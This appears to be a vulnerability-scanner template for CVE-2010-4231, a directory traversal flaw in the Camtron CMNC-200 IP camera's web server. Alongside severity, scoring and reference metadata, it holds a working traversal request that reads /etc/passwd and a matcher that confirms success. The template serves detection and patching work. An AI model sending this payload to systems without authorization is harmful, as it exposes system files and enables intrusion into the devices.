id: CVE-2010-4231 info: name: Camtron CMNC-200 IP Camera - Directory Traversal author: daffainfo severity: high description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 - https://www.exploit-db.com/exploits/15505 - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt - http://www.exploit-db.com/exploits/15505/ remediation: Upgrade to a supported product version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N cvss-score: 7.8 cve-id: CVE-2010-4231 cwe-id: CWE-22 epss-score: 0.01615 cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* epss-percentile: 0.85862 metadata: max-request: 1 vendor: camtron product: cmnc-200_firmware tags: cve,cve2010,iot,lfi,camera,edb http: - method: GET path: - "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200